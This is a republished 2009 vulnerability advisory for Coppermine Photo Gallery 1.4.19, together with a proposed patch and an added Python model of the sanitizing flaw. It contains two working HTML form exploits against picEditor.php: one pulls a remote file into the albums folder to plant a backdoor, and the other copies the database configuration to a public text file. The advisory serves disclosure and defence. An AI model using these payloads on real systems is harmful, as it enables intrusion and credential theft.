Coppermine Photo Gallery 1.4.19 Remote PHP File Upload Vulnerability
Source: vfocus.net  Author: vfocus  Published: 2009-02-02
Written By Michael Brooks
Special thanks to str0ke!


Coppermine Photo gallery - Remote PHP File Upload
Affects: v1.4.19
Homepage: http://coppermine-gallery.net/
5,239,057 downloads from sf.net!

This attack requires register_globals=On. The problem is that
the anti-register_globals protection can be bypassed.

This is in /include/init.inc.php, starting on line 42:
$keysToSkip = array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER', 'HTML_SUBST');
//...
        if (is_array($_POST)) {
                foreach ($_POST as $key => $value) {
                        if (!is_array($value))
                                $_POST[$key] = strtr($value, $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }

        if (is_array($_GET)) {
                foreach ($_GET as $key => $value) {
                        unset($_GET[$key]);
                        $_GET[strtr(stripslashes($key), $HTML_SUBST)] = strtr(stripslashes($value), $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }

        if (is_array($_COOKIE)) {
                foreach ($_COOKIE as $key => $value) {
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }
        if (is_array($_REQUEST)) {
                foreach ($_REQUEST as $key => $value) {
                        if (!is_array($value))
                                $_REQUEST[$key] = strtr($value, $HTML_SUBST);
                        if (!in_array($key, $keysToSkip) && isset($$key) && ini_get('register_globals') == '1') unset($$key);
                }
        }
	//...
	
Here is a patch that will take care of register_globals.
// With register_globals on, drop every variable in the global scope that is not whitelisted.
if(ini_get('register_globals')){
	foreach(get_defined_vars() as $var=>$val){
		//only keep superglobals we need on this whitelist, _SESSION will take care of itself:
		if(!in_array($var,array('_POST', '_GET', '_COOKIE', '_REQUEST', '_SERVER'))){
			unset($$var);
		}
	}
}
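
Added example (not part of the original advisory and not Coppermine code): a Python model of the global scope, comparing the quoted loops with the whitelist patch. The loops keep their skip list as an ordinary global in the scope they clean, so a request field named after that list removes it, while the whitelist has no such state. The scope dictionary, the function names and the placeholder values are assumptions of the model.

```python
# Constructed model of the init.inc.php loops quoted above; not Coppermine code.
KEYS_TO_SKIP = ["_POST", "_GET", "_COOKIE", "_REQUEST", "_SERVER", "HTML_SUBST"]
SOURCES = ("_POST", "_GET", "_COOKIE", "_REQUEST")   # order the loops run in


def import_request(get, post):
    """Global scope as register_globals=On leaves it (simplified)."""
    scope = {"_GET": dict(get), "_POST": dict(post), "_COOKIE": {},
             "_REQUEST": {**get, **post}, "_SERVER": {}}
    for name, value in {**get, **post}.items():
        scope.setdefault(name, value)   # assumption: superglobals are not overwritten
    return scope


def blacklist_sanitize(scope):
    """The quoted approach: unset each global that a request key names."""
    scope["keysToSkip"] = list(KEYS_TO_SKIP)   # the skip list lives in the scope it cleans
    for source in SOURCES:
        params = scope.get(source)
        if not isinstance(params, dict):       # is_array() fails once the array is unset
            continue
        for key in list(params):
            skip = scope.get("keysToSkip") or []   # an unset list matches nothing
            if key not in skip and key in scope:
                del scope[key]                 # unset($$key)
    return scope


def whitelist_sanitize(scope):
    """The patch's approach: drop every global that is not a listed superglobal."""
    keep = ("_POST", "_GET", "_COOKIE", "_REQUEST", "_SERVER")
    for name in list(scope):
        if name not in keep:
            del scope[name]
    return scope


def leftover(scope, get, post):
    """Request-supplied names that are still plain globals after sanitizing."""
    return sorted(n for n in {**get, **post} if n in scope and n not in KEYS_TO_SKIP)


# Constructed requests: field names are the ones on this page, values are placeholders.
GET = {"img_dir": "placeholder"}
PLAIN_POST = {"save": "1"}
CRAFTED_POST = {"save": "1", "keysToSkip": "1", "_GET": "1", "_REQUEST": "1"}

if __name__ == "__main__":
    for post in (PLAIN_POST, CRAFTED_POST):
        print("blacklist:", leftover(blacklist_sanitize(import_request(GET, post)), GET, post))
        print("whitelist:", leftover(whitelist_sanitize(import_request(GET, post)), GET, post))
```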


These 2 exploits are written in HTML, but they are NOT XSRF! This is
a global variable manipulation issue; you can exploit this with curl
or whatever.

This will copy www.google.com to
http://127.0.0.1/cpg1419/albums/test.php. This is very useful for
uploading backdoors.
This hijacks a call to copy(), so we need allow_url_fopen=On,
which is the default.
<html>
	<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=http%3A%2F%2Fwww.google.com&CURRENT_PIC[filename]=/test.php"
method=post>
		<input name="save" value=1>
		<input name="keysToSkip" value=1>
		<input name="_GET" value=1>
		<input name="_REQUEST" value=1>
		<input type=submit>
	</form>
</html>


This request will copy the database connection info and make it readable here:
http://10.1.1.155/Audit/cpg1419/albums/dbinfo.txt
This attack works with allow_url_fopen=Off.
<html>
	<form action="http://127.0.0.1/cpg1419/picEditor.php?img_dir=include/config.inc.php&CURRENT_PIC[filename]=/dbinfo.txt"
method=post>
		<input name="save" value=1>
		<input name="keysToSkip" value=1>
		<input name="_GET" value=1>
		<input name="_REQUEST" value=1>
		<input type=submit>
	</form>
</html>

# [2009-01-29]

 